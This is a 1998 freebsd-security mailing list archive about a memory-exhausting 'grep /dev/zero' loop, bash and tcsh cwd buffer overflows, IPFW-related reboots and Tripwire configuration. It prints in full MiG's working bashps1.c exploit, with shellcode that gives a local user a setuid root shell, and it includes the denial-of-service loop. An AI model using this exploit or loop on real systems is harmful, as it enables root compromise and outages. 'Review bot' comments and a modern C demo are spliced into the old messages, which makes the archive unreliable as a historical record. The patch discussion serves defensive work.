        :stacksize=2M:\
        :memorylocked=4M:\
        :memoryuse=10M:\
        :coredumpsize=0M:\
        :welcome=/etc/motd.lusers:

Problem
-------
Executing the following shell script effectively freezes a BSD box (tested on FreeBSD 2.2.6 & latest OpenBSD) regardless of the above process, cpu and memory restrictions within 15-30 seconds:

#!/bin/bash
# Each backgrounded grep reads /dev/zero, which never yields a newline,
# so every one of them keeps growing its line buffer until the box is
# out of memory.
while :; do
        grep ohdear /dev/zero &
done

Any ideas on how to fix this or secure against it?

Regards,

Jay Tribick
--
[| Network Admin | FastNet International | http://fast.net.uk/ |]
[| Finger netadmin@fastnet.co.uk for contact info & PGP PubKey |]
[| +44 (0)1273 T: 677633 F: 621631 e: netadmin@fast.net.uk |]

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 15 05:11:48 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id FAA22252 for freebsd-security-outgoing; Tue, 15 Sep 1998 05:11:48 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from reg.avtlg.ru ([194.186.246.3]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id FAA22235 for ; Tue, 15 Sep 1998 05:11:32 -0700 (PDT) (envelope-from vgus@reg.avtlg.ru) Received: from unita (unita.mtts-voljsky.ru [195.239.188.3]) by reg.avtlg.ru (8.8.6/8.8.6) with SMTP id QAA02055 for ; Tue, 15 Sep 1998 16:08:28 GMT Message-ID: <000c01beff73$299d9e30$03bcefc3@unita.mtts-voljsky.ru>
From: "Ignatev" To: "list_Scurity_BSD" Date: Wed, 15 Sep 1999 16:08:48 +0400 MIME-Version: 1.0 Content-Type: text/plain; charset="windows-1251" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 4.72.3110.5 X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3110.3 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org help . To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 15 05:53:26 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id FAA29414 for freebsd-security-outgoing; Tue, 15 Sep 1998 05:53:26 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from mail.euroweb.hu (mail.euroweb.hu [193.226.220.4]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id FAA29391 for ; Tue, 15 Sep 1998 05:53:17 -0700 (PDT) (envelope-from hu006co@mail.euroweb.hu) Received: (from hu006co@localhost) by mail.euroweb.hu (8.8.5/8.8.5) id OAA21692 for freebsd.org!freebsd-security; Tue, 15 Sep 1998 14:52:49 +0200 (MET DST) Received: (from zgabor@localhost) by CoDe.hu (8.8.8/8.8.8) id NAA01220 for freebsd-security@freebsd.org; Tue, 15 Sep 1998 13:04:43 +0200 (CEST) (envelope-from zgabor) 
From: Zahemszky Gabor Message-Id: <199809151104.NAA01220@CoDe.hu> Subject: csh/bash/tcsh/others? buffer overflow To: freebsd.org!freebsd-security@zg.CoDe.hu Date: Tue, 15 Sep 1998 13:04:43 +0200 (CEST) X-Mailer: ELM [version 2.4ME+ PL38 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Hi!

Did anybody read in bugtraq the story about the bash/tcsh overflow (with the code for Linux)? Well, I've tried it on 2.2.7-R with csh - the default shell for root - and it dumps core! By the way, with correct - and FreeBSD-specific - code, it might give root permissions, as the Linux trick with linux-emu (and bash-specific code) doesn't work.

Here are the most important letters about it:

--------------------------------------------
Date: Sat, 5 Sep 1998 21:28:05 +0000
From: MiG Subject: BASH buffer overflow, LiNUX x86 exploit

Here is an example exploit for the buffer overflow in bash which occurs when '\w' is set in the PS1 environment variable (Joao Manuel Carolino post). This exploit was tested on Linux x86 systems:

- Debian 1.3.1, bash 2.0.0(1)
- Red Hat 5.0, bash 1.4.17(1)

How it works:
~~~~~~~~~~~~~
Run it as ordinary user:

[debian]:~$ id
uid=1000(test) gid=1000(test) groups=1000(test)
[debian]:~$ ./bashps1
BASH '\w' option in PS1 exploit example
- Creating /tmp/tp.c
- Compiling /tmp/tp.c to /tmp/tp
- Removing /tmp/tp.c
- Creating directories AAA.../AAA.../AAA.../CODE.../ADDR...
- OK

If everything goes fine you should have a 'tp' file in the /tmp dir:

[debian]:~$ ls -l /tmp/tp
-rwxr-xr-x 1 test test 3981 Sep 4 20:54 tp

Then as root do:

bash# export PS1='bash:\w\$ '
debian:~# cd ~test
debian:/home/test# cd AAAAAAAA*/*/*/*/*
shell-init: could not get current directory: getwd: cannot access parent directories
shell-init: could not get current directory: getwd: cannot access parent directories

The bash dies... Check if there is a suid shell in the tmp dir:

[debian]:~$ ls -l /tmp/sh
-rwsr-sr-x 1 root root 304676 Sep 4 20:55 sh

Remember, whole directories are treated here as x86 assembler instructions, so AAA.../AAA... are:

incl %ecx
incl %ecx
incl %ecx
...
das
incl %ecx
incl %ecx
incl %ecx
...

So you can't change them to ordinary words, unless you know what you are doing.

Here is the code:

----x----x----x----x----bashps1.c----x----x----x----x----x----x----x----
/*
 * BASH: '\w' in PS1 environment variable - x86 exploit
 * by Miroslaw Grzybek
 *
 * - tested on: DEBIAN LINUX 1.3.1, BASH 2.0.0(1)
 *              RED HAT LINUX 5.0, BASH 1.4.17(1)
 *
 * THIS IS FOR EDUCATIONAL PURPOSES ONLY
 * USE IT AT YOUR OWN RISK
 *
 * When run, this program creates directories:
 * AAAAAA....../AAAAAA....../AAAAAA....../CODE......./RETADDR.....
 *  (255 bytes)  (255 bytes)  (255 bytes)  (50 bytes)  (255 bytes)
 *
 * When you have '\w' included in your PS1 env. variable and
 * enter the last of these directories, then the "/tmp/tp" program is
 * executed and a SUID shell "/tmp/sh" is created
 */
#include <stdio.h>
#include <stdlib.h>      /* system() */
#include <string.h>      /* strlen(), memset() */
#include <unistd.h>      /* getcwd(), chdir() */
#include <sys/stat.h>    /* mkdir() */

/*
 * Code we would like to run when stack is smashed
 */
char code[] =
    "\xeb\x24"              /* jmp GETADDR              */
    /* RUNPROG: */
    "\x5e"                  /* popl %esi                */
    "\x89\x76\x08"          /* movl %esi,0x8(%esi)      */
    "\x31\xc0"              /* xorl %eax,%eax           */
    "\x88\x46\x07"          /* movb %al,0x7(%esi)       */
    "\x89\x46\x0c"          /* movl %eax,0xc(%esi)      */
    "\xfe\x06"              /* incb (%esi)              */
    "\xfe\x46\x04"          /* incb 0x4(%esi)           */
    "\xb0\x0b"              /* movb $0xb,%al            */
    "\x89\xf3"              /* movl %esi,%ebx           */
    "\x8d\x4e\x08"          /* leal 0x8(%esi),%ecx      */
    "\x8d\x56\x0c"          /* leal 0xc(%esi),%edx      */
    "\xcd\x80"              /* int $0x80                */
    "\x31\xdb"              /* xorl %ebx,%ebx           */
    "\x89\xd8"              /* movl %ebx,%eax           */
    "\x40"                  /* incl %eax                */
    "\xcd\x80"              /* int $0x80                */
    /* GETADDR: */
    "\xe8\xd7\xff\xff\xff"  /* call RUNPROG             */
    ".tmp.tp";              /* Program to run .XXX.XX   */

/*
 * Return address, you may have to change it if expl. doesn't work
 */
int ADDR=0xbffff2ff;

int main(void)
{
    char dir[256];
    int i, align;

    printf("BASH '\\w' option in PS1 exploit example\n");
    printf("- Creating /tmp/tp.c\n");
    system("echo 'main() {' > /tmp/tp.c");
    system("echo 'system(\"cp /bin/sh /tmp/sh\");' >> /tmp/tp.c");
    system("echo 'system(\"chmod +s /tmp/sh\");' >> /tmp/tp.c");
    system("echo '}' >> /tmp/tp.c");
    printf("- Compiling /tmp/tp.c to /tmp/tp\n");
    system("gcc -o /tmp/tp /tmp/tp.c");
    printf("- Removing /tmp/tp.c\n");
    system("rm -f /tmp/tp.c");

    /* Computing alignment for the 'address' directory */
    getcwd(dir,255);
    align=(strlen(dir)+2) % 4;

    memset(dir,'A',255);
    dir[255]=0;
    printf("- Creating directories AAA.../AAA.../AAA.../CODE.../ADDR...\n");
    mkdir(dir,0777); chdir(dir);
    mkdir(dir,0777); chdir(dir);
    mkdir(dir,0777); chdir(dir);

    /* create directory whose name is our code */
    mkdir(code,0777); chdir(code);

    /* create directory whose name is the return addresses */
    for(i=align;i<252;i+=4) *(int *)&dir[i]=ADDR;
    mkdir(dir,0777);
    chdir("../../../../");
    printf("- OK\n\n");
    return 0;
}
----x----x----x----x----x----x----x----x----x----x----x----x----x----x---- Miroslaw Grzybek, Cieszyn, POLAND http://www.polsl.gliwice.pl/~mig mig@polsl.gliwice.pl 5E 13 03 B7 EA A1 CC 15 50 48 C4 96 5A EA 04 -------------------------------------------- >From owner-bugtraq@NETSPACE.ORG Tue Sep 15 08:33:38 1998 Date: Tue, 15 Sep 1998 03:02:24 +0200 From: Wichert Akkerman Subject: tcsh buffer overflow After the whole mess with bash recently I decided to take a short look at tcsh and found it has the same problems. Although tcsh-scripts are very uncommon, it's still exploitable. Below is a patch which should fix the problems. --- --- tcsh-6.07.06.orig/sh.dir.c +++ tcsh-6.07.06/sh.dir.c @@ -78,7 +78,7 @@ char path[MAXPATHLEN]; =20 /* Don't believe the login shell home, because it may be a symlink */ - tcp =3D (char *) getwd(path); + tcp =3D (char *) getcwd(path, MAXPATHLEN); if (tcp =3D=3D NULL || *tcp =3D=3D '\0') { xprintf("%s: %s\n", progname, path); if (hp && *hp) { @@ -549,7 +549,8 @@ } #endif /* apollo */ =20 - (void) strcpy(ebuf, short2str(cp)); + (void) strncpy(ebuf, short2str(cp), MAXPATHLEN); // WTA: make sure we = don't overflow ebuf + ebuf[MAXPATHLEN-1]=3D0; /* * if we are ignoring symlinks, try to fix relatives now. * if we are expading symlinks, it should be done by now. @@ -1061,7 +1062,7 @@ #endif /* apollo */ continue; /* canonicalize the link */ } -#endif /* S_IFLNK */ +#endif /* S_IFLNKXYZ */ if (slash) *p =3D '/'; } @@ -1096,7 +1097,8 @@ /* * Start comparing dev & ino backwards */ - p2 =3D Strcpy(link, cp); + p2 =3D Strncpy(link, cp, MAXPATHLEN); // WTA: remember that length-check! + link[MAXPATHLEN-1]=3D0; found =3D 0; while (*p2 && stat(short2str(p2), &statbuf) !=3D -1) { if (DEV_DEV_COMPARE(statbuf.st_dev, home_dev) && @@ -1119,7 +1121,7 @@ cp =3D newcp; } } -#endif /* S_IFLNK */ +#endif /* S_IFLNKXYZ */ =20 #ifdef apollo if (slashslash) { 
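Review bot: in the @@ -78,7 +78,7 @@ hunk, replacing getwd() with getcwd(path, MAXPATHLEN) breaks the error path that the unchanged context still depends on. getwd() writes its error message into `path` before returning NULL, which is what the following `xprintf("%s: %s\n", progname, path);` prints; getcwd() leaves `path` undefined on failure and reports through errno, so that line now prints garbage or an empty string. Print strerror(errno) there instead (or go through tcsh's own error reporting) so the bounds fix does not turn a clear diagnostic into noise.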
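Review bot: in the @@ -549,7 +549,8 @@ hunk, `strncpy(ebuf, short2str(cp), MAXPATHLEN);` followed by `ebuf[MAXPATHLEN-1]=0;` stops the overflow but silently truncates any path of MAXPATHLEN bytes or more, and the shortened string then feeds the symlink handling described in the context comments, so the shell goes on working with a directory name that is not the one the user is in. Check the length first and report an error (a `Strlen(cp) >= MAXPATHLEN` test before the copy, failing through tcsh's stderror() path) rather than truncating. Separately, `//` comments are not C89 and tcsh is built with a lot of pre-C99 compilers; use `/* */`.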
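Review bot: the @@ -1061,7 +1062,7 @@ hunk only changes the comment `#endif /* S_IFLNK */` to `#endif /* S_IFLNKXYZ */`. That is a no-op for the compiler but mislabels the `#endif` that closes the `S_IFLNK` block, and it reads like leftover local editing rather than part of the fix; the identical stray change appears again in the @@ -1119,7 +1121,7 @@ hunk. Drop both so the diff contains only the bounds fixes.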
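Review bot: in the @@ -1096,7 +1097,8 @@ hunk, `Strncpy(link, cp, MAXPATHLEN)` is tcsh's Char-string copy, so MAXPATHLEN here counts Chars, not bytes; that is only right if `link` is declared with MAXPATHLEN Chars, and the declaration is not in the hunk, so please confirm it. The copy also truncates silently, and the loop right after it (`while (*p2 && stat(short2str(p2), &statbuf) != -1)`) will then stat a shortened path instead of the real one; failing loudly on an overlong path is the safer behaviour for cwd handling. The final hunk, `Strncpy(s, dp->di_name, MAXPATHLEN)` with its own comment "assume MAXPATHLEN is okay", carries the same unverified-size assumption and needs the same check.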
@@ -1255,7 +1257,9 @@ return (0); } } - (void) Strcpy(s, dp->di_name); + + (void) Strncpy(s, dp->di_name, MAXPATHLEN); // WTA: assume MAXPATHLEN = is okay + s[MAXPATHLEN-1]=3D0; return (1); } -------------------------------------- Gabor Zahemszky ZGabor at CoDe dot HU -- #!/bin/ksh Z='21N16I25C25E30, 40M30E33E25T15U!' ;IFS=' ABCDEFGHIJKLMNOPQRSTUVWXYZ ';set $Z ;for i { [[ $i = ? ]]&&print $i&&break;[[ $i = ??? ]]&&j=$i&&i=${i%?};typeset -i40 i=8#$i;print -n ${i#???};[[ "$j" = ??? ]]&&print -n "${j#??} "&&j=;typeset +i i;};IFS=' 0123456789 ';set $Z;X=;for i { [[ $i = , ]]&&i=2;[[ $i = ?? ]]||typeset -l i;X="$X $i";typeset +l i;};print "$X" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 15 06:16:02 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id GAA03133 for freebsd-security-outgoing; Tue, 15 Sep 1998 06:16:02 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from hotmail.com (f172.hotmail.com [207.82.251.58]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id GAA03125 for ; Tue, 15 Sep 1998 06:16:01 -0700 (PDT) (envelope-from madrapour@hotmail.com) Received: (qmail 10860 invoked by uid 0); 15 Sep 1998 13:15:43 -0000 Message-ID: <19980915131543.10859.qmail@hotmail.com> Received: from 208.218.169.84 by www.hotmail.com with HTTP; Tue, 15 Sep 1998 06:15:43 PDT X-Originating-IP: [208.218.169.84] 
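The pattern behind both reports in Gabor's message, a current-directory string copied into a fixed MAXPATHLEN buffer with no length check, shown beside the two ways of bounding it, as an added example (my own code, not bash's, tcsh's or the posted patch). The 1024-byte buffer size is FreeBSD's MAXPATHLEN, hard-coded here so the demo does not pick up the host's value; the /home/test prefix and the directory component lengths come from the bashps1.c comment above, and the function names are mine:

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* FreeBSD's MAXPATHLEN, hard-coded so the demo does not pick up the
 * host's (possibly 4096-byte) value. */
#define PATHBUF 1024

/* Pre-fix pattern (bash's \w handling, tcsh's sh.dir.c before the patch):
 * the current directory is copied into a fixed buffer with no length
 * check. Overflows as soon as strlen(cwd) >= PATHBUF, and any user can
 * create a directory tree that deep. Only called with a short path below;
 * it is here for contrast. */
static void prompt_dir_unsafe(char ebuf[PATHBUF], const char *cwd)
{
    strcpy(ebuf, cwd);
}

/* What the posted tcsh patch does: bounded copy plus forced terminator.
 * No overflow, but an overlong path is silently cut to PATHBUF-1 bytes,
 * so whatever consumes ebuf now names a directory the user is not in. */
static void prompt_dir_truncate(char ebuf[PATHBUF], const char *cwd)
{
    strncpy(ebuf, cwd, PATHBUF);
    ebuf[PATHBUF - 1] = '\0';
}

/* Fail closed: refuse a path that does not fit and let the caller report it. */
static int prompt_dir_safe(char *ebuf, size_t ebufsz, const char *cwd)
{
    size_t n = strlen(cwd);
    if (n >= ebufsz)
        return -1;
    memcpy(ebuf, cwd, n + 1);
    return 0;
}

/* Constructed input: the path bashps1.c drives the root shell into, using
 * the component lengths from its own comment (three 255-byte names, a
 * 50-byte "code" name, a 255-byte "address" name) under an assumed
 * /home/test. Letters stand in for the real bytes; only the length matters.
 * Returns a malloc'd string; the caller frees it. */
static char *exploit_style_path(void)
{
    static const char home[] = "/home/test";
    static const size_t comps[] = { 255, 255, 255, 50, 255 };
    size_t total = sizeof home - 1, i, off;
    for (i = 0; i < 5; i++)
        total += 1 + comps[i];
    char *p = malloc(total + 1);
    if (p == NULL)
        return NULL;
    memcpy(p, home, sizeof home - 1);
    off = sizeof home - 1;
    for (i = 0; i < 5; i++) {
        p[off++] = '/';
        memset(p + off, 'A', comps[i]);
        off += comps[i];
    }
    p[off] = '\0';
    return p;
}

size_t exploit_style_path_len(void)
{
    char *p = exploit_style_path();
    size_t n = p ? strlen(p) : 0;
    free(p);
    return n;
}

/* 1 if the exploit-style path would overflow strcpy(), is refused by the
 * checked copy, and is silently shortened by the strncpy() version while an
 * ordinary path goes through untouched; 0 otherwise. */
int demo_bounded_copy(void)
{
    char ebuf[PATHBUF];
    char *deep = exploit_style_path();
    if (deep == NULL)
        return 0;
    int ok = strlen(deep) >= PATHBUF
          && prompt_dir_safe(ebuf, sizeof ebuf, deep) == -1
          && prompt_dir_safe(ebuf, sizeof ebuf, "/usr/home/jay") == 0
          && strcmp(ebuf, "/usr/home/jay") == 0;
    prompt_dir_truncate(ebuf, deep);
    ok = ok && strlen(ebuf) == PATHBUF - 1;
    prompt_dir_unsafe(ebuf, "/tmp");   /* fits, so harmless */
    free(deep);
    return ok;
}

int main(void)
{
    printf("exploit-style path: %zu bytes, buffer: %d bytes\n",
           exploit_style_path_len(), PATHBUF);
    printf("checked copy refuses it, strncpy() truncates it: %s\n",
           demo_bounded_copy() ? "yes" : "no");
    return 0;
}
```

prompt_dir_truncate() is what the tcsh patch does: no overflow, but the 1085-byte path comes out 1023 bytes long and names a different directory. prompt_dir_safe() refuses instead, which is what a shell should do before it starts canonicalising the name; Sheldon's point below still stands, though: with bash the overflow is only interesting when someone with privileges walks into the attacker's tree.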
From: "N. N.M" To: netadmin@fastnet.co.uk Cc: freebsd-security@FreeBSD.ORG Subject: Re: A question probably relevant to IPFW Content-Type: text/plain Date: Tue, 15 Sep 1998 06:15:43 PDT Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

>Just read through your e-mail again and what you're experiencing
>is *EXACTLY* the same as what I am.
>
>The home server was rebooting every so often, tended to be
>early in the morning (about 2am) or in the event 6-7pm.
>
>There was no exact pattern to reboots (which led me
>to believe it was either a DoS or a hardware failure)
>and so I rebuilt the machine from completely different
>components, upgraded BSD to the latest version (went
>from 2.2.1 -> 2.2.6) and thought it was all working
>fine. A few days later it started doing the same thing
>and still does it although not as often.
>
>If I get chance, I'll put a packet sniffer on the network
>(it's not that simple to do as everything is going through a
>switch).
>
>Regards,
>
>Jay Tribick

Hi,

Did you have IPFW active on that machine? It seems to be relevant directly to IPFW and packet filtering, because as I said before, the other FreeBSD with the same configuration hasn't been rebooted after it hadn't to filter the packets.

Another point: it is rebooted just at 2 am and it follows from a semi-routine timing. Being rebooted once in almost 2-3 days: Friday, Monday, Wednesday and the other week: Friday, Sunday, Tuesday! I have a line in /var/cron/log file as follows:

.....[the time of reboot, 2.05 am] ... cron [8923] : (CRON) STARTUP (fork ok)

Does anybody think that it might lead me to something?

Thanks to everyone who replied (and will reply!)
(-: ______________________________________________________ Get Your Private, Free Email at http://www.hotmail.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 15 06:28:24 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id GAA06370 for freebsd-security-outgoing; Tue, 15 Sep 1998 06:28:24 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ns0.fast.net.uk (ns0.fast.net.uk [194.207.104.1]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id GAA06339 for ; Tue, 15 Sep 1998 06:28:18 -0700 (PDT) (envelope-from netadmin@fastnet.co.uk) Received: from bofh.fast.net.uk (bofh.fast.net.uk [194.207.104.22]) by ns0.fast.net.uk (8.9.0/8.8.7) with ESMTP id OAA05609; Tue, 15 Sep 1998 14:27:56 +0100 (BST) Received: from bofh.fast.net.uk (bofh.fast.net.uk [194.207.104.22]) by bofh.fast.net.uk (8.9.1/8.8.8) with SMTP id OAA00773; Tue, 15 Sep 1998 14:27:56 +0100 (BST) (envelope-from netadmin@fastnet.co.uk) Date: Tue, 15 Sep 1998 14:27:56 +0100 (BST) 
From: Jay Tribick X-Sender: netadmin@bofh.fast.net.uk To: "N. N.M" cc: freebsd-security@FreeBSD.ORG Subject: Re: A question probably relevant to IPFW In-Reply-To: <19980915131543.10859.qmail@hotmail.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi | >There was no exact pattern to reboots (which led me | >to believe it was either a DoS or a hardware failure) | >and so I rebuilt the machine from completely different | >components, upgraded BSD to the latest version (went | >from 2.2.1 -> 2.2.6) and thought it was all working | >fine. A few days later it started doing the same thing | >and still does it although not as often. | Did you have IPFW active on that machine? It seems to be relevant | directly to IPFW and packet filtering, because as I said before, the | other FreeBSD with the same configuration hasn't been rebooted after it | hadn't to filter the packets. | | Another point: it is rebooted just at 2 am and it follows from a | semi-routine timing. Being rebooted once in almost 2-3 days: Friday, | Monday, Wednesday and the other week: Friday, Sunday, Tuesday! | I have a line in /var/cron/log file as follow: | | .....[the time of reboot, 2.05 am] ... cron [8923] : (CRON) STARTUP | (fork ok) I do have ipfw active on the machine with packet filtering but just a default let-anything-through filter. I didn't get any log entries like this, I've even been logged in just before the machine's rebooted before and there was no-one else logged in, no strange netstat -i entries.. What was in your cron that starts up at this time? /etc/daily? home# time /etc/daily real 1m25.888s user 0m2.159s sys 0m12.067s This machine's only a P75 and yet it still manages to finish /etc/daily in 1minute 25seconds. Was it 02:05 exactly? Mine's not rebooted in 6 days btw.. 
Regards, Jay Tribick -- [| Network Admin | FastNet International | http://fast.net.uk/ |] [| Finger netadmin@fastnet.co.uk for contact info & PGP PubKey |] [| +44 (0)1273 T: 677633 F: 621631 e: netadmin@fast.net.uk |] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 15 07:30:48 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id HAA17793 for freebsd-security-outgoing; Tue, 15 Sep 1998 07:30:48 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ns1.sminter.com.ar (ns1.sminter.com.ar [200.10.100.10]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id HAB17763 for ; Tue, 15 Sep 1998 07:30:40 -0700 (PDT) (envelope-from fpscha@ns1.sminter.com.ar) Received: (from fpscha@localhost) by ns1.sminter.com.ar (8.8.5/8.8.4) id LAA29506 for security@freebsd.org; Tue, 15 Sep 1998 11:29:40 -0300 (GMT) 
From: Fernando Schapachnik Message-Id: <199809151429.LAA29506@ns1.sminter.com.ar> Subject: Tripwire configuration file To: security@FreeBSD.ORG Date: Tue, 15 Sep 1998 11:29:40 -0300 (GMT) X-Mailer: ELM [version 2.4ME+ PL40 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Does anybody have a tw.conf more suitable for FreeBSD than the bsd one that comes with the tripwire distribution? Wishes to share it? ;-)

TIA

Fernando P. Schapachnik Administracion de la red S&M Internet

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 15 07:40:04 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id HAA20017 for freebsd-security-outgoing; Tue, 15 Sep 1998 07:40:04 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from mail.intercom.com ([207.51.55.117]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id HAA19952 for ; Tue, 15 Sep 1998 07:39:59 -0700 (PDT) (envelope-from jason@intercom.com) Received: from intercom.com (shagalicious.com [206.98.165.250]) by mail.intercom.com (8.9.0/8.9.0) with ESMTP id KAA11584; Tue, 15 Sep 1998 10:39:41 -0400 (EDT) Message-ID: <35FE7C66.5E73C4B6@intercom.com> Date: Tue, 15 Sep 1998 10:40:38 -0400
From: "Jason J. Horton" X-Sender: "Jason J. Horton" <@mail.intercom.com> X-Mailer: Mozilla 4.5b2 [en]C-NECCK (Win98; I) X-Accept-Language: en MIME-Version: 1.0 To: Jay Tribick CC: security@FreeBSD.ORG Subject: Re: grep ohdear /dev/zero in a tight loop freezes FreeBSD && OpenBSD References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Don't allow users on your system. -J Jay Tribick wrote: > > Background > ---------- > FreeBSD bofh.fast.net.uk 2.2.6-RELEASE FreeBSD 2.2.6-RELEASE #0 > root@bofh.fast.net.uk:/usr/src/sys/compile/GENERIC i386 > > login.conf (ulimit) restrictions: > > lockd:\ > :priority=20:\ > :openfiles=32:\ > :openfiles-cur=32:\ > :memoryuse-cur=10M:\ > :maxproc-cur=32:\ > :cputime=1h:\ > :stacksize=2M:\ > :memorylocked=4M:\ > :memoryuse=10M:\ > :coredumpsize=0M:\ > :welcome=/etc/motd.lusers: > > Problem > ------- > Executing the following shell script effectively freezes a > BSD box (tested on FreeBSD 2.2.6 & latest OpenBSD) regardless of the above > process, cpu and memory restrictions within 15-30 seconds: > > #!/bin/bash > while() do > grep ohdear /dev/zero & > done > > Any ideas on how to fix this or secure against it? 
> Regards, > > Jay Tribick > -- > [| Network Admin | FastNet International | http://fast.net.uk/ |] > [| Finger netadmin@fastnet.co.uk for contact info & PGP PubKey |] > [| +44 (0)1273 T: 677633 F: 621631 e: netadmin@fast.net.uk |] > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 15 07:42:25 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id HAA20275 for freebsd-security-outgoing; Tue, 15 Sep 1998 07:42:25 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ns0.fast.net.uk (ns0.fast.net.uk [194.207.104.1]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id HAA20264 for ; Tue, 15 Sep 1998 07:42:22 -0700 (PDT) (envelope-from netadmin@fastnet.co.uk) Received: from bofh.fast.net.uk (bofh.fast.net.uk [194.207.104.22]) by ns0.fast.net.uk (8.9.0/8.8.7) with ESMTP id PAA00879; Tue, 15 Sep 1998 15:41:58 +0100 (BST) Received: from bofh.fast.net.uk (bofh.fast.net.uk [194.207.104.22]) by bofh.fast.net.uk (8.9.1/8.8.8) with SMTP id PAA00996; Tue, 15 Sep 1998 15:41:57 +0100 (BST) (envelope-from netadmin@fastnet.co.uk) Date: Tue, 15 Sep 1998 15:41:57 +0100 (BST) 
From: Jay Tribick X-Sender: netadmin@bofh.fast.net.uk To: "Jason J. Horton" cc: security@FreeBSD.ORG Subject: Re: grep ohdear /dev/zero in a tight loop freezes FreeBSD && OpenBSD In-Reply-To: <35FE7C66.5E73C4B6@intercom.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org | > Problem | > ------- | > Executing the following shell script effectively freezes a | > BSD box (tested on FreeBSD 2.2.6 & latest OpenBSD) regardless of the above | > process, cpu and memory restrictions within 15-30 seconds: | > | > #!/bin/bash | > while() do | > grep ohdear /dev/zero & | > done | > | > Any ideas on how to fix this or secure against it? | Don't allow users on your system. I don't, it's just something I noticed while I was trying to break my system :) Hehe.. The resource limits are fine for protecting against things like fork() rabbits etc. but for some reason the above overrides them. Regards, Jay Tribick -- [| Network Admin | FastNet International | http://fast.net.uk/ |] [| Finger netadmin@fastnet.co.uk for contact info & PGP PubKey |] [| +44 (0)1273 T: 677633 F: 621631 e: netadmin@fast.net.uk |] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 15 07:44:32 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id HAA20775 for freebsd-security-outgoing; Tue, 15 Sep 1998 07:44:32 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from axl.training.iafrica.com (axl.training.iafrica.com [196.31.1.175]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id HAA20628 for ; Tue, 15 Sep 1998 07:43:41 -0700 (PDT) (envelope-from sheldonh@axl.training.iafrica.com) Received: from sheldonh (helo=axl.training.iafrica.com) by axl.training.iafrica.com with local-esmtp (Exim 1.92 #1) id 0zIwIi-0000FJ-00; Tue, 15 Sep 1998 16:41:52 +0200 
From: Sheldon Hearn To: Zahemszky Gabor cc: freebsd-security@FreeBSD.ORG Subject: Re: csh/bash/tcsh/others? buffer overflow In-reply-to: Your message of "Tue, 15 Sep 1998 13:04:43 +0200." <199809151104.NAA01220@CoDe.hu> Date: Tue, 15 Sep 1998 16:41:51 +0200 Message-ID: <948.905870511@axl.training.iafrica.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

